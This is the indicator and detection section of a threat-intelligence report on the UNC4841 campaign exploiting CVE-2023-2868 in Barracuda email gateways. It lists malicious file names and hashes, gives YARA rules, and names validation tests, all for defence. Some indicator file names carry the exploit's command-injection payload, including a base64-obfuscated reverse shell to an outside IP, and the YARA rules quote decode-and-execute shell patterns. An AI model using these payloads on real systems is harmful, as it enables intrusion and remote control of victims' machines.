abcdefg=qwesdnfkjsdhijklmnopqrstuvwxynanfasdjkfjksajdfkljeklnfisndfnhishdfhnsdanfsdnfhhhfhasdfjkqwe80749.txt CVE-2023-2868 TAR Exploit 4495cb72708f486b734de6b6c6402aba abcdefg=a123sdffsdfsdafsadfasdfsadfhijklmnopqrstuvwxyzssdffggsdfasdfafjklsadjfneiunsdfhnsndfn52023.txt CVE-2023-2868 TAR Exploit 61514ac639721a51e98c47f2ac3afe81 abcdefg=abcdfwdsaifnihdnfgiyushadhijklmnopqrstuvwxyznfhjhauidsdfasdsdfqwer5we212rsahfeadssbn37412.txt CVE-2023-2868 TAR Exploit f667939000c941e5b9dc91303c98b7fc abcdefg=aasadfewsdfsadnhijklmnopqrstuvwxyzxcjvueortyuiqwnem,nxcnngvmdfngkdjfgkjdiogjevdsfvjdfjvkl10978.txt CVE-2023-2868 TAR Exploit fe1e2d676c91f899b706682b70176983 abcdefg=c2V0c2lkIHNoIC1jICJta2ZpZm8gL3RtcC9wO3NoIC1pIDwvdG1wL3AgMj4mMXxvcGVuc3NsIHNfY2xpZW50IC1xdWlldCAtY29ubmVjdCAxMDcuMTQ4LjIyMy4xOTY6NDQzID4vdG1wL3AgMj4vZGV2L251bGw7cm0gL3RtcC9wIg==;ee=ba;G=s;"ech"o $abcdefg|${ee}se64 -d|${G}h;wh66489.txt CVE-2023-2868 TAR Exploit 0d67f50a0bf7a3a017784146ac41ada0 snapshot.tar CVE-2023-2868 TAR Exploit 7a31d314247ac33ae39a9248b770d717 snapshot.tar CVE-2023-2868 TAR Exploit 206b05ef55aff6fa453ba8e5f6c55167 imgfile.jpg CVE-2023-2868 TAR Exploit 42722b7d04f58dcb8bd80fe41c7ea09e 11111.tar CVE-2023-2868 TAR Exploit 5392fb400bd671d4b185fb35a9b23fd3 snapshot.tar CVE-2023-2868 TAR Exploit 878cf1de91f3ae543fd290c31adcbda4 snapshot.tar CVE-2023-2868 TAR Exploit ac4fb6d0bfc871be6f68bfa647fc0125 abcdefg=aasadfewsdfsadnhijklmnopqrstuvwxyzxcjvueortyuiqwnem,nxcnngvmdfngkdjfgkjdiogjevdsfvjdfjvkl10978.txt CVE-2023-2868 TAR Exploit 479315620c9a5a62a745ab586ba7b78c unknown X509 Server Certificate 683acdb559bbc7fb64431d1f579a8104 unknown X509 Server Certificate ef00c92fa005c2f61ec23d5278a8fa25 unknown X509 Server Certificate ff4f425be50bacbb10f16287aaddb7e3 unknown X509 Server Certificate 94b6f76da938ef855a91011f16252d59 core_check.sh Shell Script 32ffe48d1a8ced49c53033eb65eff6f3 BarracudaMailService.1 SEASPY 8406f74ac2c57807735a9b86f61da9f9 intent Unknown (Deleted) d81263e6872cc805e6cf4ca05d86df4e mod_content.lua SKIPJACK da06e7c32f070a9bb96b720ef332b50b nfsd.ko Unknown (Potential SANDBAR) c5c93ba36e079892c1123fe9dffd660f unknown DEPTHCHARGE Launcher 19e373b13297de1783cecf856dc48eb0 client_linux Tunneler c56d7b86e59c5c737ee7537d7cf13df1 autoins SALTWATER Launcher cb0f7f216e8965f40a724bc15db7510b update_v35.sh SALTWATER Installer 881b7846f8384c12c7481b23011d8e45 update_v31.sh SEASIDE Installer f5ab04a920302931a8bd063f27b745cc intent_helo SEASIDE Launcher 0245e7f9105253ecb30de301842e28e4 unknown SEASPY Launcher 0c227990210e7e9d704c165abd76ebe2 unknown SEASPY Launcher 132a342273cd469a34938044e8f62482 unknown SEASPY Launcher 1bc5212a856f028747c062b66c3a722a unknown SEASPY Launcher 2d841cb153bebcfdee5c54472b017af2 rc SEASPY Launcher 2e30520f8536a27dd59eabbcb8e3532a unknown SEASPY Launcher 349ca242bc6d2652d84146f5f91c3dbb intentbas SEASPY Launcher 3e3f72f99062255d6320d5e686f0e212 unknown SEASPY Launcher 4c1c2db989e0e881232c7748593d291e unknown SEASPY Launcher 7d7fd05b262342a9e8237ce14ec41c3b unknown SEASPY Launcher 8fc03800c1179a18fbd58d746596fa7d update_version SEASPY Launcher a45ca19435c2976a29300128dc410fd4 unknown SEASPY Launcher ba7af4f98d85e5847c08cf6cefdf35dc rc SEASPY Launcher c528b6398c86f8bdcfa3f9de7837ebfe update_v2.sh SEASPY Launcher c7a89a215e74104682880def469d4758 unknown SEASPY Launcher c979e8651c1f40d685be2f66e8c2c610 rc SEASPY Launcher d1392095086c07bd8d2ef174cb5f6ca8 intent_bas SEASPY Installer ad1dc51a66201689d442499f70b78dea unknown SKIPJACK Launcher dde2d3347b76070fff14f6c0412f95ba run.sh DEPTHCHARGE Archive 858174c8f4a45e9564382d4480831c6b unknown SALTWATER 2ccb9759800154de817bf779a52d48f8 update_v31.sh SEASIDE Archive 177add288b289d43236d2dba33e65956 pd WHIRLPOOL e52871d82de01b7e7f134c776703f696 rverify WHIRLPOOL 336c12441b7a678280562729c974a840 unknown SEASPY Archive 5fdee67c82f5480edfa54afc5a9dc834 install_bvp74_auth.tar SEASPY Archive 407738e565b4e9dafb07b782ebcf46b0 unknown Shell Script 67a4556b021578e0a421fdc251f07e04 install_bvp74_auth.tar SEASPY Archive 694cdb49879f1321abb4605adf634935 install_bvp74_auth.tar SEASPY Archive 6f79ef58b354fd33824c96625590c244 intent_reuse SALTWATER Launcher 7ebd5f3e800dcd0510cfcbe2351d3838 unknown SEASPRAY Archive d098fe9674b6b4cb540699c5eb452cb5 test.sh Shell Script 03e07c538a5e0e7906af803a83c97a1e r DEPTHCHARGE Archive 0dd78b785e7657999d05d52a64b4c4cf unknown DEPTHCHARGE Launcher 35a432e40da597c7ab63ff16b09d19d8 unknown DEPTHCHARGE Launcher 806250c466824a027e3e85461dc672db hw-set DEPTHCHARGE Launcher 830fca78440780aef448c862eee2a8ac hw-set DEPTHCHARGE Launcher b354111afc9c6c26c1475e761d347144 hw-set DEPTHCHARGE Launcher b745626b36b841ed03eddfb08e6bb061 libutil.so DEPTHCHARGE b860198feca7398bc79a8ec69afc65ed hw-set DEPTHCHARGE Launcher c2e577c71d591999ad5c581e49343093 run.sh DEPTHCHARGE Installer e68cd991777118d76e7bce163d8a2bc1 hw-set DEPTHCHARGE Launcher ed648c366b6e564fc636c072bbcac907 reprod_run.sh DEPTHCHARGE Installer ff005f1ff98ec1cd678785baa0386bd1 hw-set DEPTHCHARGE Launcher a28de396aa91b7faca35e861b634c502 foxdoor_shell FOXTROT 1b1830abaf95bd5a44aa3873df901f28 unknown SALTWATER 1fea55b7c9d13d822a64b2370d015da7 mod_udp.so SALTWATER 3b93b524db66f8bb3df8279a141734bb mod_rtf.so.so SALTWATER 4cd0f3219e98ac2e9021b06af70ed643 mod_udp.so SALTWATER 4ec4ceda84c580054f191caa09916c68 mod_rft.so SALTWATER 64c690f175a2d2fe38d3d7c0d0ddbb6e mod_udp.so SALTWATER 827d507aa3bde0ef903ca5dec60cdec8 mod_udp.so SALTWATER 831d41ba2a0036540536c2f884d089f9 sendscd SALTWATER 8fdf3b7dc6d88594b8b5173c1aa2bc82 mod_rft.so SALTWATER 9bc6d6af590e7d94869dee1d33cc1cae unknown SALTWATER b601fce4181b275954e3f35b18996c92 install_reuse SALTWATER Archive 9033dc5bac76542b9b752064a56c6ee4 nfsd_stub.ko SANDBAR cd2813f0260d63ad5adf0446253c2172 require_helo.lua SEASIDE cd2813f0260d63ad5adf0446253c2576 unknown SEASIDE 666da297066a2596cacb13b3da9572bf mod_sender.lua SEASIDE Launcher 35cf6faf442d325961935f660e2ab5a0 mod_attachment.lua SEASPRAY Launcher ce67bb99bc1e26f6cb1f968bc1b1ec21 unknown SEASPRAY Archive 025046adfa7b2cf50f86f5e0c6bb2ab7 unknown SEASPY 0805b523120cc2da3f71e5606255d29c resize_reisertab SEASPY 17696a438387248a12cc911fbae8620e resize_reisertab SEASPY 19ebfe05040a8508467f9415c8378f32 BarracudaMailService SEASPY 1b92e5455de794af560f10a907d931cc resize2fstab SEASPY 1bbb32610599d70397adfdaf56109ff3 BarracudaMailService SEASPY 23f4f604f1a05c4abf2ac02f976b746b unknown SEASPY 3c20617f089fe5cc9ba12c43c6c072f5 unknown SEASPY 45b79949276c9cb9cf5dc72597dc1006 resize_reisertab SEASPY 4b511567cfa8dbaa32e11baf3268f074 BarracudaMailService SEASPY 4ca4f582418b2cc0626700511a6315c0 BarracudaMailService SEASPY 5d6cba7909980a7b424b133fbac634ac BarracudaMailService SEASPY 69ef9a9e8d0506d957248e983d22b0d5 resize2fstab SEASPY 724079649f690ca1ee80b8b3125b58b9 unknown SEASPY 76811232ede58de2faf6aca8395f8427 resize2fstab SEASPY 82eaf69de710abdc5dea7cd5cb56cf04 BarracudaMailService SEASPY 8f1c40bd3ab33d517839ca17591d8666 resize2fstab SEASPY a08a99e5224e1baf569fda816c991045 BarracudaMailService SEASPY bef722484288e24258dd33922b1a7148 resize2fstab SEASPY d8e748b1b609d376f57343b2bde94b29 unknown SEASPY db4c48921537d67635bb210a9cb5bb52 BarracudaMailService SEASPY e80a85250263d58cc1a1dc39d6cf3942 BarracudaMailService SEASPY f6857841a255b3b4e4eded7a66438696 unknown SEASPY fe031a93c84aa3d01e2223a6bb988fa0 unknown SEASPY 3273a29d15334efddd8276af53c317fb mknod SKIPJACK Installer 446f3d71591afa37bbd604e2e400ae8b mknod SKIPJACK Installer 87847445f9524671022d70f2a812728f mod_content.lua SKIPJACK 9aa90d767ba0a3f057653aadcb75e579 unknown SKIPJACK e4e86c273a2b67a605f5d4686783e0cc mknod SKIPJACK Installer ec0d46b2aa7adfdff10a671a77aeb2ae unknown SKIPJACK Installer 436587bad5e061a7e594f9971d89c468 saslautchd WHIRLPOOL 85c5b6c408e4bdb87da6764a75008adf rverify WHIRLPOOL f013a111044f3228b978f49e1ee374fe mod_attachment.lua SEASPRAY Launcher 90a75b588f63c6a0294a48e93628aec9 nfsd_stub.ko SANDBAR DETECTION RULES YARA RULES rule M_APT_Installer_SKIPJACK_1 { meta: author = "Mandiant" md5 = "e4e86c273a2b67a605f5d4686783e0cc" strings: $str1 = "hdr:name() == 'Content-ID'" base64 $str2 = "hdr:body() ~= nil" base64 $str3 = "string.match(hdr:body(),\"^[%w%+/=\\r\\n]+$\")" base64 $str4 = "openssl aes-256-cbc" base64 $str5 = "mod_content.lua" $str6 = "#!/bin/sh" condition: all of them } SKIPJACK Installer rule M_APT_Backdoor_SKIPJACK_1 { meta: author = "Mandiant" md5 = "87847445f9524671022d70f2a812728f" strings: $str1 = "hdr:name() == 'Content-ID'" $str2 = "hdr:body() ~= nil" $str3 = "string.match(hdr:body(),\"^[%w%+/=\\r\\n]+$\")" $str4 = "openssl aes-256-cbc" $str5 = "| base64 -d| sh 2>" condition: all of them } TSKIPJACK Backdoor rule M_APT_Backdoor_DEPTHCHARGE_1 { meta: author = "Mandiant" md5 = "b745626b36b841ed03eddfb08e6bb061" strings: $backdoor_command_main = { 65 63 68 6F 20 2D 6E 20 27 25 73 27 20 7C (20 62 61 73 65 36 34 20 2D 64 20 7C 20 | 20 ) 6F 70 65 6E 73 73 6C 20 61 65 73 2D 32 35 36 2D 63 62 63 20 2D 64 20 2D 4B 20 [24-124] 20 32 3e 2f 64 65 76 2f 6e 75 6c 6c 20 7c 20 73 68 } $e1 = "welcomeflag" fullword $e2 = "welcomebuffer" fullword $e3 = "launch_backdoor" fullword $e4 = "backdoor_initalize" fullword $s1 = "BSMTP_ID" fullword $s2 = "result %d" fullword $s3 = "ehlo" fullword condition: uint32(0)==0x464c457f and $backdoor_command_main and 4 of them } DEPTHCHARGE rule M_APT_Launcher_FOXGLOVE_1 { meta: author = "Mandiant" md5 = "c9ae8bfd08f57d955465f23a5f1c09a4" strings: $str1 = { 48 ?? 66 6F 78 64 6F 6F 72 5F 48 89 ?? C7 ?? ?? 73 68 65 6C 66 C7 ?? ?? 6C 00 } $str2 = { 48 ?? 2F 75 73 72 2F 73 68 61 48 ?? 72 65 2F 66 6F 78 64 6F 48 89 ?? 48 89 ?? ?? 48 ?? 6F 72 2F 66 6F 78 64 6F 48 ?? 6F 72 5F 73 68 65 6C 6C } $str3 = "shell" $str4 = "start.c" $str5 = "base64en" $str6 = "base64de" $str7 = "-r" $str8 = "-s" $str9 = "-p" $str10 = "-t" condition: uint32(0) == 0x464c457f and all of them } FOXGLOVE rule M_APT_Backdoor_FOXTROT_1 { meta: author = "Mandiant" md5 = "a28de396aa91b7faca35e861b634c502" strings: $str1 = "/usr/share/foxdoor/uuid" $str2 = "/.mozilla/firefox/" $str3 = "hide_foxdoor_mod" $str4 = "POST /api/index.cgi" $str5 = "7(Zu9YTsA7qQ#vw" $str6 = "CONNECT %s:%d HTTP/1.1" $str7 = "network.proxy.http_port" $str8 = "exec bash --rcfile" condition: uint32(0) == 0x464c457f and all of them } FOXTROT Mandiant Security Validation Actions Organizations can validate their security controls using the following actions with Mandiant Security Validation. VID Name A106-709 Command and Control UNC4841, DNS Query, Variant #10 A106-710 A106-710 Command and Control UNC4841, DNS Query, Variant #2 A106-711 Command and Control UNC4841, DNS Query, Variant #3 A106-712 Command and Control UNC4841, DNS Query, Variant #11 A106-713 Command and Control UNC4841, DNS Query, Variant #4 A106-714 Command and Control UNC4841, DNS Query, Variant #5 A106-715 Command and Control UNC4841, DNS Query, Variant #8 A106-716 Command and Control UNC4841, DNS Query, Variant #7 A106-717 Command and Control UNC4841, DNS Query, Variant #6 A106-718 Command and Control UNC4841, DNS Query, Variant #9 A106-719 Malicious File Transfer UNC4841, DEPTHCHARGE, Download, Variant #1 A106-720 Malicious File Transfer UNC4841, SALTWATER, Download, Variant #2 A106-721 Malicious File Transfer UNC4841, FOXTROT, Download, Variant #1 A106-722 Malicious File Transfer UNC4841, SKIPJACK, Download, Variant #2 Posted in * Threat Intelligence RELATED ARTICLES Threat Intelligence CAPA EXPLORER WEB: A WEB-BASED TOOL FOR PROGRAM CAPABILITY ANALYSIS By Mandiant • 6-minute read Threat Intelligence LUMMAC2: OBFUSCATION THROUGH INDIRECT CONTROL FLOW By Mandiant • 23-minute read Threat Intelligence STAYING A STEP AHEAD: MITIGATING THE DPRK IT WORKER THREAT By Mandiant • 25-minute read Threat Intelligence UNC1860 AND THE TEMPLE OF OATS: IRAN’S HIDDEN HAND IN MIDDLE EASTERN NETWORKS By Mandiant • 21-minute read FOOTER LINKS FOLLOW US * * * * * * Google Cloud * Google Cloud Products * Privacy * Terms * Manage cookies * Help * LanguageEnglishDeutschFrançais한국어日本語